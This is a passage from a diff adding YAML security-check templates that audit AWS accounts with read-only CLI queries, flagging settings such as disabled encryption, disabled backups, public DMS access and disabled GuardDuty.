name: DMS Multi-AZ Not Enabled
author: DhiyaneshDK
severity: medium
description: |
Ensure that your Amazon Database Migration Service (DMS) replication instances are using Multi-AZ deployment configurations to provide High Availability (HA) through automatic failover to standby replicas in the event of a failure such as an Availability Zone (AZ) outage, an internal hardware or network outage, a software failure or in case of a planned maintenance session
impact: |
Not enabling Multi-AZ for Database Migration Service can lead to increased downtime and data loss risks during outages, compromising the availability and reliability of your database operations.
remediation: |
Enable Multi-AZ support for your Database Migration Service to enhance availability and resilience, ensuring automatic failover and reducing downtime during outages.
reference:
- https://www.trendmicro.com/cloudoneconformity-staging/knowledge-base/aws/DMS/multi-az.html
- https://docs.aws.amazon.com/cli/latest/reference/dms/describe-replication-instances.html
tags: cloud,devops,aws,amazon,dms,aws-cloud-config
variables:
region: "us-west-2"
flow: |
code(1)
for(let ReplicationInstances of iterate(template.replications)){
set("replication", ReplicationInstances)
code(2)
}
self-contained: true
code:
- engine:
- sh
- bash
source: |
aws dms describe-replication-instances --region $region --query "ReplicationInstances[*].ReplicationInstanceArn" --output json
extractors:
- type: json
name: replications
internal: true
json:
- '.[]'
- engine:
- sh
- bash
source: |
aws dms describe-replication-instances --region $region --filters Name=replication-instance-arn,Values=$replication --query "ReplicationInstances[*].MultiAZ" --output json
matchers:
- type: word
words:
- "false"
extractors:
- type: dsl
dsl:
- '"DMS Multi-AZ " + replication + " is not enabled"'
# digest: 4a0a004730450220052c0de2e02b60b42a79e7d02c2e38f90423664ca041b2dddd276b0f0b55d3fa022100a434388c051cee8dfa5e4d962699aa4abdc66971013a62f1cc3c85a9c434519b:922c64590222798bb761d5b6d8e72950

59
cloud/aws/dms/dms-public-access.yaml Normal file
View File

@ -0,0 +1,59 @@
id: dms-public-access
info:
name: Publicly Accessible DMS Replication Instances
author: DhiyaneshDK
severity: medium
description: |
Ensure that your Amazon Database Migration Service (DMS) are not publicly accessible from the Internet in order to avoid exposing private data and minimize security risks.
impact: |
Publicly accessible DMS replication instances expose your database to unauthorized access and potential attacks, increasing the risk of data breaches and compromising the security of sensitive information.
remediation: |
Restrict access to your DMS replication instances by configuring security groups and network access controls to allow connections only from trusted IP addresses and private subnets, ensuring that they are not publicly accessible.
reference:
- https://www.trendmicro.com/cloudoneconformity-staging/knowledge-base/aws/DMS/publicly-accessible.html
- https://docs.aws.amazon.com/dms/latest/userguide/CHAP_ReplicationInstance.html
tags: cloud,devops,aws,amazon,dms,aws-cloud-config
variables:
region: "us-west-2"
flow: |
code(1)
for(let ReplicationInstances of iterate(template.replications)){
set("replication", ReplicationInstances)
code(2)
}
self-contained: true
code:
- engine:
- sh
- bash
source: |
aws dms describe-replication-instances --region $region --query "ReplicationInstances[*].ReplicationInstanceArn" --output json
extractors:
- type: json
name: replications
internal: true
json:
- '.[]'
- engine:
- sh
- bash
source: |
aws dms describe-replication-instances --region $region --filters Name=replication-instance-arn,Values=$replication --query "ReplicationInstances[*].PubliclyAccessible" --output json
matchers:
- type: word
words:
- "true"
extractors:
- type: dsl
dsl:
- '"DMS Replication Instances " + replication + " Publicly Accessible"'
# digest: 4b0a00483046022100c2e4b02073095257867ae2f880894485ce4395d427a0f5797433d453d16557b4022100f11bea387537d175614dcbe4c0e1f7a3d19cfe18b2eb5177157de179677aaea4:922c64590222798bb761d5b6d8e72950

59
cloud/aws/dms/dms-version-upgrade.yaml Normal file
View File

@ -0,0 +1,59 @@
id: dms-version-upgrade
info:
name: DMS Auto Minor Version Upgrade
author: DhiyaneshDK
severity: medium
description: |
Ensure that your Amazon Database Migration Service (DMS) replication instances have the Auto Minor Version Upgrade feature enabled in order to receive automatically minor engine upgrades.
impact: |
Not enabling DMS Auto Minor Version Upgrade can lead to running outdated database versions, increasing vulnerability to security risks and bugs, while missing out on performance improvements and new features provided in minor updates.
remediation: |
Enable DMS Auto Minor Version Upgrade to automatically apply minor version updates, ensuring your database is always up-to-date with the latest security patches, performance enhancements, and bug fixes.
reference:
- https://www.trendmicro.com/cloudoneconformity-staging/knowledge-base/aws/DMS/auto-minor-version-upgrade.html
- https://docs.aws.amazon.com/cli/latest/reference/dms/index.html
tags: cloud,devops,aws,amazon,dms,aws-cloud-config
variables:
region: "us-west-2"
flow: |
code(1)
for(let ReplicationInstances of iterate(template.replications)){
set("replication", ReplicationInstances)
code(2)
}
self-contained: true
code:
- engine:
- sh
- bash
source: |
aws dms describe-replication-instances --region $region --query "ReplicationInstances[*].ReplicationInstanceArn" --output json
extractors:
- type: json
name: replications
internal: true
json:
- '.[]'
- engine:
- sh
- bash
source: |
aws dms describe-replication-instances --region $region --filters Name=replication-instance-arn,Values=$replication --query "ReplicationInstances[*].AutoMinorVersionUpgrade" --output json
matchers:
- type: word
words:
- "false"
extractors:
- type: dsl
dsl:
- '"DMS Auto Minor Version Upgrade " + replication + " not enabled"'
# digest: 4b0a00483046022100e170aa216555156ddf46a196e60d6985d37d29f32146f0bfeaeef1ceba09e73c022100f95487bc9c2f2bfe9288a9362f868268f3bb7cd963b36c44be1b6629a06b3a6b:922c64590222798bb761d5b6d8e72950

61
cloud/aws/ebs/ebs-encryption-disabled.yaml Normal file
View File

@ -0,0 +1,61 @@
id: ebs-encryption-disabled
info:
name: EBS Encryption - Disabled
author: DhiyaneshDK
severity: high
description: |
Ensure that all your Amazon Elastic Block Store (EBS) volumes are encrypted in order to meet security and compliance requirements. With encryption enabled, your EBS volumes can hold sensitive, confidential, and critical data.
impact: |
Disabling AWS EBS encryption exposes sensitive data to unauthorized access, increasing the risk of data breaches and compliance violations.
remediation: |
Enable encryption for all existing EBS volumes and ensure that all new volumes created are configured to use encryption by default. Additionally, update any snapshots to be encrypted and use AWS Key Management Service (KMS) to manage encryption keys securely.
reference:
- https://www.trendmicro.com/cloudoneconformity-staging/knowledge-base/aws/EBS/ebs-encrypted.html
- http://docs.aws.amazon.com/AWSEC2/latest/UserGuide/EBSEncryption.html
tags: cloud,devops,aws,amazon,ebs,aws-cloud-config
variables:
region: "us-west-2"
flow: |
code(1)
for(let VolumesVolumeId of iterate(template.volumes)){
set("volume", VolumesVolumeId)
code(2)
}
self-contained: true
code:
- engine:
- sh
- bash
source: |
aws ec2 describe-volumes --region $region --query 'Volumes[*].VolumeId' --output json
extractors:
- type: json
name: volumes
internal: true
json:
- '.[]'
- engine:
- sh
- bash
source: |
aws ec2 describe-volumes --region $region --volume-ids $volume --query 'Volumes[*].Encrypted' --output text
matchers:
- type: word
words:
- "False"
extractors:
- type: dsl
dsl:
- '"EBS Encryption " + volumes + " is Disabled"'
# digest: 4a0a00473045022100fe98ba08fe06c9398f905a0651ac60c5cfbdbeaf2fa0c524aa9d2c0e29d3c75902200ab089e32558f42e2a7f8d5fafb3e309dfe261bad4e417532734222a7cbaa7cf:922c64590222798bb761d5b6d8e72950

60
cloud/aws/efs/efs-encryption-disabled.yaml Normal file
View File

@ -0,0 +1,60 @@
id: efs-encryption-disabled
info:
name: EFS Encryption - Disabled
author: DhiyaneshDK
severity: medium
description: |
Ensure that the data available on your Amazon EFS file systems is encrypted at rest in order to meet security and compliance requirements.
impact: |
Sensitive data transmitted or stored in Redis could be exposed, leading to potential data breaches or unauthorized access.
remediation: |
Enable encryption for AWS EFS by configuring encryption at rest in the EFS settings to protect data from unauthorized access.
reference:
- https://www.trendmicro.com/cloudoneconformity-staging/knowledge-base/aws/ElastiCache/in-transit-and-at-rest-encryption.html
- https://docs.aws.amazon.com/efs/latest/ug/encryption.html
tags: cloud,devops,aws,amazon,efs-encryption-disabled,aws-cloud-config
variables:
region: "us-west-2"
flow: |
code(1)
for(let FileSystemId of iterate(template.filesystemids)){
set("filesystemid", FileSystemId)
code(2)
}
self-contained: true
code:
- engine:
- sh
- bash
source: |
aws efs describe-file-systems --region $region --output json --query 'FileSystems[*].FileSystemId'
extractors:
- type: json
name: filesystemids
internal: true
json:
- '.[]'
- engine:
- sh
- bash
source: |
aws efs describe-file-systems --region $region --file-system-id $filesystemid --query 'FileSystems[*].Encrypted' --output json
matchers:
- type: word
words:
- "false"
extractors:
- type: dsl
dsl:
- 'filesystemid + " EFS Encryption is Disabled"'
# digest: 490a0046304402202f3524493875a0119ee2ee6e8fc65a74c5f15c1e355ac921c5835d100f13bc7302200d7986a9d0b33d821a24772e250381523a6c47374b1f84ca39891df988fefc87:922c64590222798bb761d5b6d8e72950

60
cloud/aws/elasticache/cache-automatic-backups-disabled.yaml Normal file
View File

@ -0,0 +1,60 @@
id: cache-automatic-backups-disabled
info:
name: ElastiCache Automatic Backups - Disabled
author: DhiyaneshDK
severity: medium
description: |
Ensure that Amazon ElastiCache is configured to take automatic daily backups for Redis cache clusters.
impact: |
Disabling ElastiCache automatic backups increases the risk of data loss, as you won't have point-in-time recovery options in case of data corruption or accidental deletion.
remediation: |
enable automatic backups in the AWS Management Console for your ElastiCache Redis or Memcached cluster to ensure regular snapshots for data recovery.
reference:
- https://www.trendmicro.com/cloudoneconformity-staging/knowledge-base/aws/ElastiCache/enable-automatic-backups.html
- https://docs.aws.amazon.com/AmazonElastiCache/latest/red-ug/backups-automatic.html
tags: cloud,devops,aws,amazon,elasticache,aws-cloud-config
variables:
region: "us-west-2"
flow: |
code(1)
for(let ReplicationGroupId of iterate(template.replicationgroupids)){
set("replicationgroup", ReplicationGroupId)
code(2)
}
self-contained: true
code:
- engine:
- sh
- bash
source: |
aws elasticache describe-replication-groups --region $region --output json --query 'ReplicationGroups[*].ReplicationGroupId'
extractors:
- type: json
name: replicationgroupids
internal: true
json:
- '.[]'
- engine:
- sh
- bash
source: |
aws elasticache describe-replication-groups --replication-group-id $replicationgroup --query 'ReplicationGroups[*].SnapshotRetentionLimit' --region $region --output json
matchers:
- type: word
words:
- '0'
extractors:
- type: dsl
dsl:
- 'replicationgroup + " ElastiCache Automatic Backups is Disabled"'
# digest: 4a0a0047304502210087c54085d08d635a332b799ec9ec22d6ddfa6740d360649eab91c74f128664ca0220747eef461974f2e267e2356c4f18a67918ca9b085d0e0cf0b81be01288315ebd:922c64590222798bb761d5b6d8e72950

60
cloud/aws/elasticache/cache-event-notification-disabled.yaml Normal file
View File

@ -0,0 +1,60 @@
id: cache-event-notification-disabled
info:
name: ElastiCache Event Notifications - Disabled
author: DhiyaneshDK
severity: medium
description: |
Ensure that your Amazon ElastiCache clusters are configured to send event notifications via Amazon Simple Notification Service (SNS) in order to monitor your cache clusters for important events and quickly mitigate any issues with your cache system.
impact: |
Disabling ElastiCache event notifications prevents timely alerts about cluster events, such as failovers, maintenance updates, or configuration changes, which can hinder proactive incident response and monitoring.
remediation: |
To remediate the disabled ElastiCache event notifications, enable event notifications in the AWS Management Console by configuring an Amazon SNS topic to receive alerts for important cluster events.
reference:
- https://www.trendmicro.com/cloudoneconformity-staging/knowledge-base/aws/ElastiCache/enable-cluster-event-notifications.html
- https://docs.aws.amazon.com/AmazonElastiCache/latest/red-ug/ECEvents.SNS.html
tags: cloud,devops,aws,amazon,elasticache,aws-cloud-config
variables:
region: "us-west-2"
flow: |
code(1)
for(let CacheClusterId of iterate(template.cacheclusterids)){
set("cacheclusterid", CacheClusterId)
code(2)
}
self-contained: true
code:
- engine:
- sh
- bash
source: |
aws elasticache describe-cache-clusters --region $region --output json --query 'CacheClusters[*].CacheClusterId'
extractors:
- type: json
name: cacheclusterids
internal: true
json:
- '.[]'
- engine:
- sh
- bash
source: |
aws elasticache describe-cache-clusters --region $region --cache-cluster-id $cacheclusterid --query 'CacheClusters[*].NotificationConfiguration.TopicArn' --output json
matchers:
- type: word
words:
- '[]'
extractors:
- type: dsl
dsl:
- 'replicationgroup + " ElastiCache Event Notifications is Disabled"'
# digest: 4b0a00483046022100ab045d9b41360da2b45ee3b9c537ba52e19a0755acb19ec581b2ed23f9dc20a5022100ffa958947047b3edf93b57eef8be1044206e78ca23573a7a1afaf60fdf92b531:922c64590222798bb761d5b6d8e72950

61
cloud/aws/elasticache/cache-redis-encryption-disabled.yaml Normal file
View File

@ -0,0 +1,61 @@
id: cache-redis-encryption-disabled
info:
name: ElastiCache Redis In-Transit and At-Rest Encryption - Disabled
author: DhiyaneshDK
severity: high
description: |
Ensure that your Amazon ElastiCache Redis cache clusters are encrypted in order to meet security and compliance requirements.
impact: |
Sensitive data transmitted or stored in Redis could be exposed, leading to potential data breaches or unauthorized access.
remediation: |
Enable in-transit and at-rest encryption in the Redis cluster settings to protect sensitive data.
reference:
- https://www.trendmicro.com/cloudoneconformity-staging/knowledge-base/aws/ElastiCache/in-transit-and-at-rest-encryption.html
- https://docs.aws.amazon.com/AmazonElastiCache/latest/red-ug/in-transit-encryption.html
- https://docs.aws.amazon.com/AmazonElastiCache/latest/red-ug/at-rest-encryption.html
tags: cloud,devops,aws,amazon,elasticache,aws-cloud-config
variables:
region: "us-west-2"
flow: |
code(1)
for(let ReplicationGroupId of iterate(template.replicationgroupids)){
set("replicationgroup", ReplicationGroupId)
code(2)
}
self-contained: true
code:
- engine:
- sh
- bash
source: |
aws elasticache describe-replication-groups --region $region --output json --query 'ReplicationGroups[*].ReplicationGroupId'
extractors:
- type: json
name: replicationgroupids
internal: true
json:
- '.[]'
- engine:
- sh
- bash
source: |
aws elasticache describe-replication-groups --region $region --replication-group-id $replicationgroup --query 'ReplicationGroups[*].[AtRestEncryptionEnabled,TransitEncryptionEnabled] | []' --output json
matchers:
- type: word
words:
- "false"
extractors:
- type: dsl
dsl:
- 'replicationgroup + " ElastiCache Redis In-Transit and At-Rest Encryption is Disabled"'
# digest: 4b0a00483046022100c36ec305884cf56077c4292344b9fae8b609e594655832d1904ca65a1aee63d00221009a93c7d9990d13b1b8fafa34671dcfcef0805a7e98d0df94566791411fd0a593:922c64590222798bb761d5b6d8e72950

60
cloud/aws/elasticache/cache-redis-multiaz-disabled.yaml Normal file
View File

@ -0,0 +1,60 @@
id: cache-redis-multiaz-disabled
info:
name: ElastiCache Redis Multi-AZ - Disabled
author: DhiyaneshDK
severity: medium
description: |
Ensure that your Amazon ElastiCache Redis cache clusters are using a Multi-AZ deployment configuration to enhance reliability through automatic failover.
impact: |
Disabling ElastiCache Redis Multi-AZ can lead to data loss and increased downtime in the event of a primary node failure, as failover to a secondary node in a different availability zone will not occur automatically.
remediation: |
Enable Multi-AZ replication in the ElastiCache Redis settings or create a new cluster with Multi-AZ enabled to ensure high availability.
reference:
- https://www.trendmicro.com/cloudoneconformity-staging/knowledge-base/aws/ElastiCache/elasticache-multi-az.html
- https://docs.aws.amazon.com/AmazonElastiCache/latest/red-ug/WhatIs.Components.html
tags: cloud,devops,aws,amazon,elasticache,aws-cloud-config
variables:
region: "us-west-2"
flow: |
code(1)
for(let ReplicationGroupId of iterate(template.replicationgroupids)){
set("replicationgroup", ReplicationGroupId)
code(2)
}
self-contained: true
code:
- engine:
- sh
- bash
source: |
aws elasticache describe-replication-groups --region $region --output json --query 'ReplicationGroups[*].ReplicationGroupId'
extractors:
- type: json
name: replicationgroupids
internal: true
json:
- '.[]'
- engine:
- sh
- bash
source: |
aws elasticache describe-replication-groups --region $region --replication-group-id $replicationgroup --query 'ReplicationGroups[*].MultiAZ'
matchers:
- type: word
words:
- 'disabled'
extractors:
- type: dsl
dsl:
- 'replicationgroup + " ElastiCache Redis Multi-AZ is Disabled"'
# digest: 4a0a0047304502204301e43ac045c6186aedb2a1a074610422c2002d90876cf4ac2d3402436911b6022100b9868d4c62014154ed9d7f27e2aa4282e365d89ee6795b2f192a11c9e74505e8:922c64590222798bb761d5b6d8e72950

59
cloud/aws/firehose/firehose-server-destination-encryption.yaml Normal file
View File

@ -0,0 +1,59 @@
id: firehose-server-destination-encryption
info:
name: Firehose Delivery Stream Destination Encryption - Disabled
author: DhiyaneshDK
severity: medium
description: |
Ensure that your Kinesis Firehose delivery stream data records are encrypted at destination (i.e. Amazon S3) in order to meet regulatory requirements and protect your Firehose data at rest.
impact: |
Disabling encryption for Firehose delivery stream destinations can lead to sensitive data being stored unencrypted, increasing the risk of data exposure and unauthorized access.
remediation: |
Enable encryption for Firehose delivery stream destinations to ensure that all data is encrypted at rest, safeguarding sensitive information from unauthorized access and potential data breaches.
reference:
- https://www.trendmicro.com/cloudoneconformity-staging/knowledge-base/aws/Firehose/delivery-stream-destination-encryption.html
- https://docs.aws.amazon.com/AmazonS3/latest/dev/UsingKMSEncryption.html
tags: cloud,devops,aws,amazon,firehose,aws-cloud-config
variables:
region: "us-west-2"
flow: |
code(1)
for(let DeliveryStreamNames of iterate(template.deliverys)){
set("delivery", DeliveryStreamNames)
code(2)
}
self-contained: true
code:
- engine:
- sh
- bash
source: |
aws firehose list-delivery-streams --region $region --query 'DeliveryStreamNames' --output json
extractors:
- type: json
name: deliverys
internal: true
json:
- '.[]'
- engine:
- sh
- bash
source: |
aws firehose describe-delivery-stream --region $region --delivery-stream-name $delivery --query 'DeliveryStreamDescription.Destinations[*].ExtendedS3DestinationDescription.EncryptionConfiguration' --output json
matchers:
- type: word
words:
- "NoEncryption"
extractors:
- type: dsl
dsl:
- '"Firehose Delivery Stream Destination " + delivery + " Encryption is Disabled"'
# digest: 490a0046304402201742209d94926b372dbccead7a059d88a973ed2020c9a79e7015331a3e66b20002206a6c98cac36c76d372585674da6f65d3dd50ee0053363cb2f9ffeefa9bf88460:922c64590222798bb761d5b6d8e72950

59
cloud/aws/firehose/firehose-server-side-encryption.yaml Normal file
View File

@ -0,0 +1,59 @@
id: firehose-server-side-encryption
info:
name: Firehose Delivery Stream Server-Side Encryption - Disabled
author: DhiyaneshDK
severity: high
description: |
Ensure that your Amazon Kinesis Data Firehose delivery streams are encrypted using Server-Side Encryption.
impact: |
Disabling server-side encryption for Firehose delivery streams can result in unencrypted data being stored, exposing sensitive information to unauthorized access and increasing the risk of data breaches.
remediation: |
Enable server-side encryption for Firehose delivery streams to ensure that data is securely encrypted at rest, protecting sensitive information from unauthorized access.
reference:
- https://www.trendmicro.com/cloudoneconformity-staging/knowledge-base/aws/Firehose/delivery-stream-encrypted-with-kms-customer-master-keys.html
- https://docs.aws.amazon.com/AmazonS3/latest/dev/UsingKMSEncryption.html
tags: cloud,devops,aws,amazon,firehose,aws-cloud-config
variables:
region: "us-west-2"
flow: |
code(1)
for(let DeliveryStreamNames of iterate(template.deliverys)){
set("delivery", DeliveryStreamNames)
code(2)
}
self-contained: true
code:
- engine:
- sh
- bash
source: |
aws firehose list-delivery-streams --region $region --query 'DeliveryStreamNames' --output json
extractors:
- type: json
name: deliverys
internal: true
json:
- '.[]'
- engine:
- sh
- bash
source: |
aws firehose describe-delivery-stream --region $region --delivery-stream-name $delivery --query 'DeliveryStreamDescription.DeliveryStreamEncryptionConfiguration.KeyType' --output json
matchers:
- type: word
words:
- "null"
extractors:
- type: dsl
dsl:
- '"Firehose delivery stream " + delivery + " is not encrypted using SSE"'
# digest: 4a0a00473045022100c27f022ba1deaf796d3a13a7fff3ccc19f5c8ccafb2406a5632741e33645b130022018b443d8917635142e697c54efccbdd18fd4873b7cc9fdebac19537f0ddbcdf7:922c64590222798bb761d5b6d8e72950

58
cloud/aws/guardduty/guardduty-findings.yaml Normal file
View File

@ -0,0 +1,58 @@
id: guardduty-findings
info:
name: Open GuardDuty Findings
author: DhiyaneshDK
severity: medium
description: |
Check for AWS GuardDuty findings and resolve them step by step to ensure that your AWS infrastructure is protected against security threats.
impact: |
GuardDuty findings indicate potential security threats, such as compromised instances, unauthorized access, or malicious activities within your AWS environment, requiring immediate investigation.
remediation: |
Investigate and respond to GuardDuty findings by analyzing the threat details and taking corrective actions, such as blocking malicious IPs, revoking compromised credentials, or isolating affected instances. Use AWS Security Hub or AWS Config for automated remediation where applicable.
reference:
- https://www.trendmicro.com/cloudoneconformity-staging/knowledge-base/aws/GuardDuty/findings.html
- https://docs.aws.amazon.com/guardduty/latest/ug/guardduty_findings.html
tags: cloud,devops,aws,amazon,guardduty,aws-cloud-config
variables:
region: "us-west-2"
flow: |
code(1)
for(let DetectorIds of iterate(template.detectors)){
set("detector", DetectorIds)
code(2)}
self-contained: true
code:
- engine:
- sh
- bash
source: |
aws guardduty list-detectors --region $region --query 'DetectorIds' --output json
extractors:
- type: json
name: detectors
internal: true
json:
- '.[]'
- engine:
- sh
- bash
source: |
aws guardduty list-findings --region $region --detector-id $detector --query 'FindingIds' --output json
matchers:
- type: regex
regex:
- '\"(.*)\"'
extractors:
- type: dsl
dsl:
- '"The AWS account has open GuardDuty Findings"'
# digest: 4a0a00473045022100e3c328614414aef385eb992b48dc665cffd2a483618b008b2b8cc7cff933c87502202c2e1a3ef936449c944508ccfb2460ac96d065c3e72244fb83cb529ed5a3e95e:922c64590222798bb761d5b6d8e72950

39
cloud/aws/guardduty/guardduty-not-enabled.yaml Normal file
View File

@ -0,0 +1,39 @@
id: guardduty-not-enabled
info:
name: GuardDuty Not Enabled
author: DhiyaneshDK
severity: info
description: |
Ensure that Amazon GuardDuty service is currently enabled in all regions in order to protect your AWS environment and infrastructure (AWS accounts and resources, IAM credentials, guest operating systems, applications, etc) against security threats.
impact: |
GuardDuty disabled leaves your AWS environment vulnerable to undetected threats, such as unauthorized access, anomalous activities, and potential security breaches, compromising the overall security posture.
remediation: |
Enable GuardDuty to continuously monitor and detect security threats in your AWS environment.
reference:
- https://www.trendmicro.com/cloudoneconformity-staging/knowledge-base/aws/GuardDuty/guardduty-enabled.html
- https://docs.aws.amazon.com/guardduty/latest/ug/guardduty_settingup.html
tags: cloud,devops,aws,amazon,guardduty,aws-cloud-config
variables:
region: "us-west-2"
self-contained: true
code:
- engine:
- sh
- bash
source: |
aws guardduty list-detectors --region $region --query 'DetectorIds' --output json
matchers:
- type: word
words:
- "[]"
extractors:
- type: dsl
dsl:
- '"GuardDuty Is Not Enabled"'
# digest: 4b0a00483046022100a4b4d58c1c63e777f526ea729b0606c9778e22d31303546c4dd802e07f6adbaf022100b6259e9ecca607e4a4a59f5783407a2624c810904acde7de240c6b371fbf65c0:922c64590222798bb761d5b6d8e72950

59
cloud/aws/guardduty/malware-protection-disabled.yaml Normal file
View File

@ -0,0 +1,59 @@
id: malware-protection-disabled
info:
name: GuardDuty Malware Protection - Disabled
author: DhiyaneshDK
severity: info
description: |
Ensure that the Malware Protection feature is enabled for your Amazon GuardDuty detectors.
impact: |
GuardDuty Malware Protection disabled increases the risk of undetected malware threats on EBS volumes, potentially leading to data compromise or system breaches.
remediation: |
Enable GuardDuty Malware Protection by configuring the feature in the GuardDuty console or using the AWS CLI, to scan EBS volumes for malware and ensure proactive threat detection.
reference:
- https://www.trendmicro.com/cloudoneconformity-staging/knowledge-base/aws/GuardDuty/enable-malware-protection.html
- https://docs.aws.amazon.com/guardduty/latest/ug/malware-protection.html
tags: cloud,devops,aws,amazon,guardduty,aws-cloud-config
variables:
region: "us-west-2"
flow: |
code(1)
for(let DetectorIds of iterate(template.detectors)){
set("detector", DetectorIds)
code(2)
}
self-contained: true
code:
- engine:
- sh
- bash
source: |
aws guardduty list-detectors --region $region --query 'DetectorIds' --output json
extractors:
- type: json
name: detectors
internal: true
json:
- '.[]'
- engine:
- sh
- bash
source: |
aws guardduty get-detector --region $region --detector-id "$detector" --query 'DataSources.MalwareProtection.ScanEc2InstanceWithFindings.EbsVolumes.Status' --output json
matchers:
- type: word
words:
- "DISABLED"
extractors:
- type: dsl
dsl:
- '"GuardDuty Malware Protection " + detector + " is Disabled"'
# digest: 4b0a00483046022100decfe07108934c7e0cc3a86caa2ebb9e10c7ab08a6eb81fdad419f5ccc0e4924022100b723fe87a025db147a310cb8210fc4ee048e49ca029d8c4d1e74eeab03b91eab:922c64590222798bb761d5b6d8e72950

59
cloud/aws/guardduty/s3-protection-disabled.yaml Normal file
View File

@ -0,0 +1,59 @@
id: s3-protection-disabled
info:
name: GuardDuty S3 Protection - Disabled
author: DhiyaneshDK
severity: medium
description: |
Ensure that the S3 Protection feature is enabled for your Amazon GuardDuty detectors.
impact: |
GuardDuty S3 Protection disabled increases the risk of undetected malicious activities, such as unauthorized access or data exfiltration, within S3 buckets.
remediation: |
Enable GuardDuty S3 Protection by configuring it in the GuardDuty console or via AWS CLI to monitor S3 buckets for unauthorized access and malicious activities.
reference:
- https://www.trendmicro.com/cloudoneconformity-staging/knowledge-base/aws/GuardDuty/enable-s3-protection.html
- https://docs.aws.amazon.com/guardduty/latest/ug/s3-protection.html
tags: cloud,devops,aws,amazon,guardduty,aws-cloud-config
variables:
region: "us-west-2"
flow: |
code(1)
for(let DetectorIds of iterate(template.detectors)){
set("detector", DetectorIds)
code(2)
}
self-contained: true
code:
- engine:
- sh
- bash
source: |
aws guardduty list-detectors --region $region --query 'DetectorIds' --output json
extractors:
- type: json
name: detectors
internal: true
json:
- '.[]'
- engine:
- sh
- bash
source: |
aws guardduty get-detector --region $region --detector-id "$detector" --query 'DataSources.S3Logs.Status' --output json
matchers:
- type: word
words:
- "DISABLED"
extractors:
- type: dsl
dsl:
- '"GuardDuty S3 Protection " + detector + " is Disabled"'
# digest: 4a0a0047304502201cb765569f71fef3078bc3e696e2e2cdde022763c3263167499c6cb873421a6b0221009484f07bc61583c6e21c8d07156bc75367a977e71a4db9c3828257b14022fa00:922c64590222798bb761d5b6d8e72950

4
cloud/aws/iam/iam-user-password-change.yaml
View File

@ -20,10 +20,10 @@ code:
matchers:
- type: word
words:
- "true"
- "false"
extractors:
- type: dsl
dsl:
- '"AllowUsersToChangePassword Policy is not enabled in your AWS account"'
# digest: 4b0a00483046022100b046545d3c72c54dee9c4051661d61c8241cbce1fb0f655fa4bb1e8461b3f295022100a7bb33ba3ddff07e68db9bd748802715215b8d62be69ab27fab22c5e539cbb28:922c64590222798bb761d5b6d8e72950
# digest: 4b0a00483046022100a110f462d8f5e4466b712fd0e894e70d3f25a2880789f42656e9a234f347f0ed022100c3b0fa07fb3f150db61f3c0715c8197371d98a9b4fe21f2837c2243ceb33b064:922c64590222798bb761d5b6d8e72950

40
cloud/aws/inspector2/inspector2-disabled.yaml Normal file
View File

@ -0,0 +1,40 @@
id: inspector2-disabled
info:
name: Amazon Inspector 2 - Disabled
author: DhiyaneshDK
severity: info
description: |
Ensure that the new version of Amazon Inspector is enabled in order to help you improve the security and compliance of your AWS cloud environment.
impact: |
Amazon Inspector 2 disabled increases the risk of unaddressed vulnerabilities in your EC2 instances, Lambda functions, and container images, leaving your environment exposed to potential security threats.
remediation: |
Enable Amazon Inspector 2 to automatically scan for vulnerabilities in EC2 instances, Lambda functions, and container images by using the AWS Management Console or using the AWS CLI.
reference:
- https://www.trendmicro.com/cloudoneconformity-staging/knowledge-base/aws/Inspector2/enable-amazon-inspector2.html
- https://aws.amazon.com/about-aws/whats-new/2021/11/amazon-inspector-continual-vulnerability-management/
tags: cloud,devops,aws,amazon,inspector2,aws-cloud-config
variables:
region: "us-west-2"
self-contained: true
code:
- engine:
- sh
- bash
source: |
aws inspector2 batch-get-account-status --region $region --query 'accounts[*].[accountId,state.status]' --output json
matchers:
- type: word
words:
- '"DISABLED"'
extractors:
- type: dsl
dsl:
- '"Amazon Inspector 2 " + region + " is Disabled"'
# digest: 4a0a0047304502204c395c8b6be9e20ec59536a0e23e6563659d5b7bd5e33d711610bff4c9f04d67022100ba18cd98feeefa78561f5b09c4771df6f68c6f4f03784dc57d8b2073a61129d2:922c64590222798bb761d5b6d8e72950

60
cloud/aws/rds/rds-auto-minor-upgrade-disabled.yaml Normal file
View File

@ -0,0 +1,60 @@
id: rds-auto-minor-upgrade-disabled
info:
name: RDS Auto Minor Version Upgrade - Disabled
author: DhiyaneshDK
severity: medium
description: |
Ensure that your Amazon RDS database instances have the Auto Minor Version Upgrade flag enabled in order to receive automatically minor engine upgrades during the specified maintenance window.
impact: |
The RDS instance may miss critical security patches and minor feature updates, increasing vulnerability to security risks and bugs.
remediation: |
Enable auto minor version upgrades for the RDS instance through the AWS Management Console, CLI, or API to ensure timely application of security patches and updates.
reference:
- https://www.trendmicro.com/cloudoneconformity-staging/knowledge-base/aws/RDS/rds-auto-minor-version-upgrade.html
- http://docs.aws.amazon.com/AmazonRDS/latest/UserGuide/USER_UpgradeDBInstance.Upgrading.html
tags: cloud,devops,aws,amazon,rds,aws-cloud-config
variables:
region: "us-west-2"
flow: |
code(1)
for(let DBClusterIdentifier of iterate(template.dbclusters)){
set("dbcluster", DBClusterIdentifier)
code(2)
}
self-contained: true
code:
- engine:
- sh
- bash
source: |
aws rds describe-db-instances --region $region --output json --query 'DBInstances[?Engine==`mysql` || Engine==`postgres`].DBInstanceIdentifier | []' --output json
extractors:
- type: json
name: dbclusters
internal: true
json:
- '.[]'
- engine:
- sh
- bash
source: |
aws rds describe-db-instances --region $region --db-instance-identifier $dbcluster --query 'DBInstances[*].AutoMinorVersionUpgrade' --output json
matchers:
- type: word
words:
- 'false'
extractors:
- type: dsl
dsl:
- 'dbcluster + " RDS Auto Minor Version Upgrade is Disabled"'
# digest: 4a0a00473045022100af0e66ac1bdc81235715fe6e81e67ad54d83705aac3969f70fff9512321aa2780220554e2a16c4bd3cd676145fd521e0b598f5537fca46eeb51dc70109a32b6ed317:922c64590222798bb761d5b6d8e72950

60
cloud/aws/rds/rds-automated-backup-disabled.yaml Normal file
View File

@ -0,0 +1,60 @@
id: rds-automated-backup-disabled
info:
name: RDS Automated Backups - Disabled
author: DhiyaneshDK
severity: high
description: |
Ensure that your Amazon RDS database instances have automated backups enabled for point-in-time recovery.
impact: |
Data loss risk increases, as the RDS instance cannot be automatically restored to a previous state in case of failure or accidental deletion.
remediation: |
Enable automated backups for the RDS instance in the AWS Management Console, CLI, or API to ensure regular, automatic backups are created and retained.
reference:
- https://www.trendmicro.com/cloudoneconformity-staging/knowledge-base/aws/RDS/rds-automated-backups-enabled.html
- http://docs.aws.amazon.com/AmazonRDS/latest/UserGuide/USER_WorkingWithAutomatedBackups.html
